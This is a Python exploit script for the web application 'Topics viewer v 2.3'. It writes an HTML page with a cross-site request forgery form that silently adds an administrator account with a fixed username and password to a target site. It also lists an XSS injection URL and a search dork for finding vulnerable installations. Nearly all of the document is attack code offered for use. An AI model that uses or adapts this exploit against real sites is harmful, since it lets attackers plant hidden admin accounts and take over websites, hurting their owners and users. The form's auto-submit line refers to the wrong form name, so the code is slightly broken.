#!/usr/bin/env python
########################################################################
# Title : Topics viewer v 2.3 csrf Add Admin and XSS
# Author : Cyber-Crystal
# Version : 2.3
# Homepage : http://nilehoster.com/default/topicsviewer
# Dork : "Programmed by : Nilehoster.com"
# Tested on: Win/7
# Based on POC : http://vb.ehcommunity.com/showthread.php?t=70682
# CVE : 14 May 2012
#---------------------------------------------------------------------
# ^_^ > snc0pe | secure-x41 | Dmar al3noOoz | al-swisre || All
#
#
# Xss Exploit is Here :
# http://localhost//admincp/edit_block.php?id=XSS
import sys
import string
import os
def banner():
print '''
----------------------------------
Topics viewer v 2.3 csrf Add Admin
----------------------------------
[+] python Exploit.py http://www.exp.com
'''
if os.name == "nt":
os.system("cls")
os.system("color e")
else :
os.system('clear')
if len(sys.argv) < 2:
banner()
sys.exit()
vic = sys.argv[1].replace("http://","").replace("/","")
file = open("Exploit.html", "w")
db = ("<html>\n"
"<body>\n"
"<form action='http://"+vic+"/admincp/main.php?op=add-admin' method='post' name='sdf'>\n"
"<input type='text' name='u_name' value='p0c' />\n"
"<input type='text' name='u_m_pass' value='1212' />\n"
"<input type='text' name='u_email' value='p0c@p0c.com' />\n"
"<input type='text' name='verification' value='101010'/> <!-- Any number-->\n"
"<script>document.xss.submit();</script><br />\n"
"<input type='submit' value='Exploit'/>\n"
"</form>\n"
"</body>\n"
"</html>\n")
file.write(db)
print "Createing ...\n"
print "user Name And Password ...\n"
print "User : p0c \t Pass : 1212"
# The End